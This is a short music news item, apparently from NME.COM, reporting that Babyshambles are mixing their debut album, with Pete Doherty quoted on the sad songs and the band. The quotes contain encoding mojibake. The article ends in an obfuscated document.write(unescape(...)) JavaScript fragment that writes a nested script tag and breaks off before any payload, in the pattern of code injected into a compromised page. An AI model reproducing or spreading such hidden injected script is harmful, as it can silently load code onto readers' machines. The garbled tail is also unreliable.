Babyshambles are mixing their long-awaited debut album, which is set for release in September.
The band have been holed up in a west London studio over the last couple of weeks working on songs which will feature on their as-yet-untitled new record.
Pete Doherty told NME.COM: “It's done now, we're just mixing it. There's a couple of surprises in there. A couple of new ones we wrote when we were in there like ‘Up The Morning'. We don't have a title yet, it's like with The Libertines, it's the last day when we get the artwork in. I like ‘Up The Morning', it's one of my favourite tracks in there.â€
Discussing the album theme, Pete added: “There's a lot of really sad, sad songs on it and it's quite hard mixing it and listening to your voice over and over again with those lyrics. But it's too late to turn back. It's the best record I've ever made, by a long shot. It's like four people in a room â€" a band for the first time. There's definitely a lot less politics. We feel like we're a gang of mates really. We've been through a fucking lot together and they've been so patient waiting for the prison shit. â€document.write(unescape("\074\123CR\111PT%3E\144oc%75\155%65n\04574.w%72\151te\050un\145\163ca\160e(%22
